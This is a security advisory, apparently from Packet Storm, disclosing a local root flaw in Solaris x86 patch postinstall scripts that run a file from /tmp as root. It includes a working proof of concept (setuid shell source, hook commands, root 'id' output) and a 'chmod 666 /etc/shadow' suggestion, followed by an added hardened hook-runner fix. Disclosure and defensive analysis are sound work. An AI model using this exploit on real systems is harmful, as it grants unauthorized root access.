Solaris Recommended Patch Cluster 6/19 Local Root

Larry W. Cashdollar
packetstormsecurity.com, PACKETSTORM:122306
Jul 08, 2013

EPSS: 0 (percentile 0.4%)

Solaris Recommended Patch Cluster 6/19 local root on x86

Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (in multi-user mode), a local user can execute commands as root. This only affects x86 systems, as the code resides under a case statement checking that the platform is Intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before the patch's postinstall runs and your commands are executed as root.
./144751-01/SUNWos86r/install/postinstall (lines 782-785):

if [ -s /tmp/diskette_rc.d/rcs9.sh ]
then
    /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
fi
  
Another angle in the same script (lines 804-807): it rewrites driver_aliases through a fixed file name under /tmp. Inject entries into driver_aliases that way? Research the config file; maybe we can load our own library/driver.

# Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
TMPFILE=/tmp/ncrstmp
sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver_aliases >$TMPFILE
cp $TMPFILE ${BASEDIR}/etc/driver_aliases
  
  
./141445-09/SUNWos86r/install/postinstall (lines 656-659):

if [ -s /tmp/diskette_rc.d/rcs9.sh ]
then
    /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
fi
  
  
Well, it looks like you've got a few chances to abuse it:  
  
  
larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;  
./144501-19/SUNWos86r/install/postinstall  
./141445-09/SUNWos86r/install/postinstall  
./142059-01/SUNWos86r/install/postinstall  
./147148-26/SUNWos86r/install/postinstall  
./127128-11/SUNWos86r/install/postinstall  
./148889-03/SUNWos86r/install/postinstall  
./142910-17/SUNWos86r/install/postinstall  
./144751-01/SUNWos86r/install/postinstall  
  
Pseudo PoC:
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry; the scripts only test that the file is non-empty (-s) before running it.
chmod 666 /etc/shadow would be easy.
PoC:  
larry@slowaris:~$ cat setuid.c
#include <stdio.h>
#include <unistd.h>

/* Helper binary: once the hook has made it root-owned and setuid,
   running it hands back a root shell. */
int
main (void)
{
    char *shell[2];
    shell[0] = "sh";
    shell[1] = NULL;
    setregid (0, 0);                 /* real and effective gid -> root */
    setreuid (0, 0);                 /* real and effective uid -> root */
    execve ("/bin/sh", shell, NULL); /* replace ourselves with a shell */
    return(0);
}
gcc -o /tmp/r00t setuid.c
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh
chown root:root /tmp/r00t
chmod +s /tmp/r00t
After patches have been applied:  
larry@slowaris:~$ /tmp/r00t  
# id  
uid=0(root) gid=0(root)  
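The postinstall scripts quoted above run whatever sits at a fixed path under /tmp as root after nothing more than a "[ -s FILE ]" test. The following is an added example, not code from the advisory or from Sun's patches, showing the check a hook runner should make before executing such a file: the file and its parent directory must be a regular file/directory, not symlinks, owned by the invoking user (root at patch time), and not group- or world-writable. The function names secure_path and run_hook are this example's own.

```shell
#!/bin/sh
# Added example (not from the advisory): hardened replacement for the
# "[ -s /tmp/diskette_rc.d/rcs9.sh ] && /sbin/sh ..." pattern in the
# SUNWos86r postinstall scripts.  Only POSIX sh features are used.

# secure_path PATH KIND   KIND is f (regular file) or d (directory).
# Returns 0 if PATH may be trusted, 1 otherwise.
secure_path() {
    p=$1
    kind=$2
    [ -L "$p" ] && return 1                 # never follow a symlink
    case $kind in
        f) [ -f "$p" ] || return 1 ;;
        d) [ -d "$p" ] || return 1 ;;
        *) return 1 ;;
    esac
    # ls -ldn prints "<perms> <links> <uid> <gid> ..." with numeric owner;
    # this only rewrites this function's own positional parameters.
    set -- $(ls -ldn "$p")
    perms=$1
    owner=$3
    [ "$owner" = "$(id -u)" ] || return 1   # owned by someone else
    case $perms in
        ?????w*|????????w*) return 1 ;;     # group- or world-writable
    esac
    return 0
}

# run_hook HOOK [ARGS...]
# Exit status 0: hook ran; 1: hook rejected; 2: no hook present, which
# mirrors the original scripts' silent skip when the file is missing/empty.
run_hook() {
    hook=$1
    shift
    [ -s "$hook" ] || return 2
    if ! secure_path "$(dirname "$hook")" d; then
        echo "refusing $hook: untrusted directory" >&2
        return 1
    fi
    if ! secure_path "$hook" f; then
        echo "refusing $hook: untrusted file" >&2
        return 1
    fi
    /bin/sh "$hook" "$@"
}

# Usage as a postinstall would call it:
#   run_hook /tmp/diskette_rc.d/rcs9.sh post
```

Against the advisory's scenario this refuses the hook outright, because /tmp/diskette_rc.d is created and owned by the unprivileged user. The ownership and permission tests are the minimum; the better fix is to stop reading hooks from a fixed, world-writable location at all and keep them under a root-owned directory created for the patch run.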
